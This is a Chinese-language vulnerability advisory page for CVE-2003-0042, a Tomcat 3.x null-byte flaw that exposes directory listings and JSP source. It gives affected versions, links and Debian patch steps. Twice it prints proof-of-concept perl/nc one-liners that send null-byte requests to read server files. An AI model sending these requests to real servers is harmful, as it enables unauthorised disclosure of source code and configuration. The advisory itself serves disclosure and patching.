CVE-2003-0042
CVSS5.0
发布时间 :2003-02-07 00:00:00
修订时间 :2016-10-17 22:28:42
NMCOES    

[原文]Jakarta Tomcat before 3.3.1a, when used with JDK 1.3.1 or earlier, allows remote attackers to list directories even with an index.html or other file present, or obtain unprocessed source code for a JSP file, via a URL containing a null character.


[CNNVD]Apache Tomcat空字节目录/文件泄漏漏洞(CNNVD-200302-018)

        
        Apache Tomcat是一个流行的开放源码的JSP应用服务器程序。
        Apache Tomcat JDK 1.3.1及其以前版本的软件实现上存在漏洞,远程攻击者可能利用此漏洞获取服务器上目录和文件的内容。
        Apache Tomcat对存在空字节(%00)和反斜杠('\')字符的web请求的处理上存在漏洞,可能会泄漏目录和文件的内容。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:apache:tomcat:3.2.1Apache Software Foundation Tomcat 3.2.1
cpe:/a:apache:tomcat:3.3Apache Software Foundation Tomcat 3.3
cpe:/a:apache:tomcat:3.3.1Apache Software Foundation Tomcat 3.3.1
cpe:/a:apache:tomcat:3.2Apache Software Foundation Tomcat 3.2
cpe:/a:apache:tomcat:3.2.3Apache Software Foundation Tomcat 3.2.3
cpe:/a:apache:tomcat:3.1Apache Software Foundation Tomcat 3.1
cpe:/a:apache:tomcat:3.2.4Apache Software Foundation Tomcat 3.2.4
cpe:/a:apache:tomcat:3.0Apache Software Foundation Tomcat 3.0
cpe:/a:apache:tomcat:3.1.1Apache Software Foundation Tomcat 3.1.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0042
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0042
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200302-018
(官方数据源) CNNVD

- 其它链接及资源

http://jakarta.apache.org/builds/jakarta-tomcat/release/v3.3.1a/
(VENDOR_ADVISORY)  CONFIRM  http://jakarta.apache.org/builds/jakarta-tomcat/release/v3.3.1a/
http://jakarta.apache.org/builds/jakarta-tomcat/release/v3.3.1a/RELEASE-NOTES-3.3.1a.txt
(VENDOR_ADVISORY)  CONFIRM  http://jakarta.apache.org/builds/jakarta-tomcat/release/v3.3.1a/RELEASE-NOTES-3.3.1a.txt
http://marc.info/?l=bugtraq&m=104394568616290&w=2
(UNKNOWN)  BUGTRAQ  20030130 Apache Jakarta Tomcat 3 URL parsing vulnerability
http://www.ciac.org/ciac/bulletins/n-060.shtml
(UNKNOWN)  CIAC  N-060
http://www.debian.org/security/2003/dsa-246
(VENDOR_ADVISORY)  DEBIAN  DSA-246
http://www.securityfocus.com/advisories/5111
(UNKNOWN)  HP  HPSBUX0303-249
http://www.securityfocus.com/bid/6721
(UNKNOWN)  BID  6721
http://xforce.iss.net/xforce/xfdb/11194
(UNKNOWN)  XF  tomcat-null-directory-listing(11194)

- 漏洞信息

Apache Tomcat空字节目录/文件泄漏漏洞
中危 输入验证
2003-02-07 00:00:00 2005-10-20 00:00:00
远程  
        
        Apache Tomcat是一个流行的开放源码的JSP应用服务器程序。
        Apache Tomcat JDK 1.3.1及其以前版本的软件实现上存在漏洞,远程攻击者可能利用此漏洞获取服务器上目录和文件的内容。
        Apache Tomcat对存在空字节(%00)和反斜杠('\')字符的web请求的处理上存在漏洞,可能会泄漏目录和文件的内容。
        

- 公告与补丁

        厂商补丁:
        Debian
        ------
        Debian已经为此发布了一个安全公告(DSA-246-1)以及相应补丁:
        DSA-246-1:New tomcat packages fix information exposure and cross site scripting
        链接:
        http://www.debian.org/security/2003/dsa-246

        补丁下载:
        Source archives:
        
        http://security.debian.org/pool/updates/contrib/t/tomcat/tomcat_3.3a-4woody1.dsc

        Size/MD5 checksum: 714 1c34b1fdedf90ea10531ed12a8c6ae0b
        
        http://security.debian.org/pool/updates/contrib/t/tomcat/tomcat_3.3a-4woody1.diff.gz

        Size/MD5 checksum: 15146 c58c7edd2df1a806b510068ab7a9a04f
        
        http://security.debian.org/pool/updates/contrib/t/tomcat/tomcat_3.3a.orig.tar.gz

        Size/MD5 checksum: 2087545 2df39325c7293ee11ae5547281ca1077
        Architecture independent components:
        
        http://security.debian.org/pool/updates/contrib/t/tomcat/tomcat_3.3a-4woody1_all.deb

        Size/MD5 checksum: 1196810 1ed6efa36586a8a3d3b527aeebbc4531
        Intel IA-32 architecture:
        
        http://security.debian.org/pool/updates/contrib/t/tomcat/libapache-mod-jk_3.3a-4woody1_i386.deb

        Size/MD5 checksum: 51522 1e11d6a43654fc6d921c8bc90ad15b4b
        补丁安装方法:
        1. 手工安装补丁包:
         首先,使用下面的命令来下载补丁软件:
         # wget url (url是补丁下载链接地址)
         然后,使用下面的命令来安装补丁:
         # dpkg -i file.deb (file是相应的补丁名)
        2. 使用apt-get自动安装补丁包:
         首先,使用下面的命令更新内部数据库:
         # apt-get update
        
         然后,使用下面的命令安装更新软件包:
         # apt-get upgrade
        Apache Software Foundation
        --------------------------
        目前厂商已经在3.3.1a及其以后版本的软件中修复了这个安全问题,请到厂商的主页下载:
        
        http://jakarta.apache.org/tomcat/index.html

- 漏洞信息 (22205)

Apache Tomcat 3.x Null Byte Directory/File Disclosure Vulnerability (EDBID:22205)
linux remote
2003-01-26 Verified
0 Jouko Pynnönen
N/A [点击下载]
source: http://www.securityfocus.com/bid/6721/info

Apache Tomcat is prone to a directory/file disclosure vulnerability when used with JDK 1.3.1 or earlier.

It has been reported that remote attackers may view directory contents (even when an 'index.html' or other welcome file). It is also possible for remote attackers to disclose the contents of files.

This vulnerability is due to improper handling of null bytes (%00) and backslash ('\') characters in requests for web resources.

GET /<null byte>.jsp HTTP/1.0
$ perl -e 'print "GET /\x00.jsp HTTP/1.0\r\n\r\n";' | nc my.server 8080
$ perl -e 'print "GET /admin/WEB-INF\\classes/ContextAdmin.java\x00.jsp HTTP/1.0\r\n\r\n";'|nc my.server 8080
$ perl -e 'print "GET /examples/jsp/cal/cal1.jsp\x00.html HTTP/1.0\r\n\r\n";'|nc my.server 8080		

- 漏洞信息

12232
Apache Tomcat with JDK Arbitrary Directory/Source Disclosure
Information Disclosure
Loss of Confidentiality

- 漏洞描述

Unknown or Incomplete

- 时间线

2003-01-25 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Apache Tomcat Null Byte Directory/File Disclosure Vulnerability
Input Validation Error 6721
Yes No
2003-01-26 12:00:00 2009-07-11 08:06:00
This vulnerability was discovered by Jouko Pynnönen of Online Solutions Ltd.

- 受影响的程序版本

Apache Software Foundation Tomcat 3.3.1
Apache Software Foundation Tomcat 3.3
- BSDI BSD/OS 4.0
- Caldera OpenLinux 2.4
- Conectiva Linux 5.1
- Debian Linux 2.2
- Debian Linux 2.1
- Digital UNIX 4.0
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.0
- Mandriva Linux Mandrake 7.1
- Mandriva Linux Mandrake 7.0
- NetBSD NetBSD 1.4.2 x86
- NetBSD NetBSD 1.4.1 x86
- RedHat Linux 6.2 i386
- RedHat Linux 6.1 i386
- SGI IRIX 6.5
- SGI IRIX 6.4
- Sun Solaris 8_sparc
- Sun Solaris 7.0
Apache Software Foundation Tomcat 3.2.4
Apache Software Foundation Tomcat 3.2.3
Apache Software Foundation Tomcat 3.2.1
- BSDI BSD/OS 4.0
- Caldera OpenLinux 2.4
- Conectiva Linux 5.1
- Debian Linux 2.2
- Debian Linux 2.1
- Digital UNIX 4.0
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.0
- HP Secure OS software for Linux 1.0
- Mandriva Linux Mandrake 7.1
- Mandriva Linux Mandrake 7.0
- NetBSD NetBSD 1.4.2 x86
- NetBSD NetBSD 1.4.1 x86
- RedHat Linux 6.2 i386
- RedHat Linux 6.1 i386
- SGI IRIX 6.5
- SGI IRIX 6.4
- Sun Solaris 8_sparc
- Sun Solaris 7.0
Apache Software Foundation Tomcat 3.2
- BSDI BSD/OS 4.0
- Caldera OpenLinux 2.4
- Conectiva Linux 5.1
- Debian Linux 2.2
- Debian Linux 2.1
- Digital UNIX 4.0
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.0
- Mandriva Linux Mandrake 7.1
- Mandriva Linux Mandrake 7.0
- NetBSD NetBSD 1.4.2 x86
- NetBSD NetBSD 1.4.1 x86
- RedHat Linux 6.2 i386
- RedHat Linux 6.1 i386
- SGI IRIX 6.5
- SGI IRIX 6.4
- Sun Solaris 8_sparc
- Sun Solaris 7.0
Apache Software Foundation Tomcat 3.1.1
Apache Software Foundation Tomcat 3.1
- BSDI BSD/OS 4.0
- Caldera OpenLinux 2.4
- Conectiva Linux 5.1
- Debian Linux 2.2
- Debian Linux 2.1
- Digital UNIX 4.0
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.0
- Mandriva Linux Mandrake 7.1
- Mandriva Linux Mandrake 7.0
- NetBSD NetBSD 1.4.2 x86
- NetBSD NetBSD 1.4.1 x86
- RedHat Linux 6.2 i386
- RedHat Linux 6.1 i386
- SGI IRIX 6.5
- SGI IRIX 6.4
- Sun Solaris 8_sparc
- Sun Solaris 7.0
Apache Software Foundation Tomcat 3.0
- BSDI BSD/OS 4.0
- Caldera OpenLinux 2.4
- Debian Linux 2.2
- Debian Linux 2.1
- Digital UNIX 4.0
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.0
- Mandriva Linux Mandrake 7.1
- Mandriva Linux Mandrake 7.0
- NetBSD NetBSD 1.4.2 x86
- NetBSD NetBSD 1.4 x86
- RedHat Linux 6.2 i386
- RedHat Linux 6.1 i386
- SGI IRIX 6.5
- SGI IRIX 6.4
- Sun Solaris 8_sparc
- Sun Solaris 7.0
Apache Software Foundation Tomcat 3.3.1 a

- 不受影响的程序版本

Apache Software Foundation Tomcat 3.3.1 a

- 漏洞讨论

Apache Tomcat is prone to a directory/file disclosure vulnerability when used with JDK 1.3.1 or earlier.

It has been reported that remote attackers may view directory contents (even when an 'index.html' or other welcome file). It is also possible for remote attackers to disclose the contents of files.

This vulnerability is due to improper handling of null bytes (%00) and backslash ('\') characters in requests for web resources.

- 漏洞利用

The following proof of concepts were provided:

GET /&lt;null byte&gt;.jsp HTTP/1.0
$ perl -e 'print "GET /\x00.jsp HTTP/1.0\r\n\r\n";' | nc my.server 8080
$ perl -e 'print "GET /admin/WEB-INF\\classes/ContextAdmin.java\x00.jsp HTTP/1.0\r\n\r\n";'|nc my.server 8080
$ perl -e 'print "GET /examples/jsp/cal/cal1.jsp\x00.html HTTP/1.0\r\n\r\n";'|nc my.server 8080

- 解决方案

HP has released an advisory (HPSBUX0303-249) that contains fixes to address this issue.

This issue has been addressed in Apache Tomcat 3.3.1a.

Fixes are available:


Apache Software Foundation Tomcat 3.0

Apache Software Foundation Tomcat 3.1

Apache Software Foundation Tomcat 3.1.1

Apache Software Foundation Tomcat 3.2

Apache Software Foundation Tomcat 3.2.1

Apache Software Foundation Tomcat 3.2.3

Apache Software Foundation Tomcat 3.2.4

Apache Software Foundation Tomcat 3.3

Apache Software Foundation Tomcat 3.3.1

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站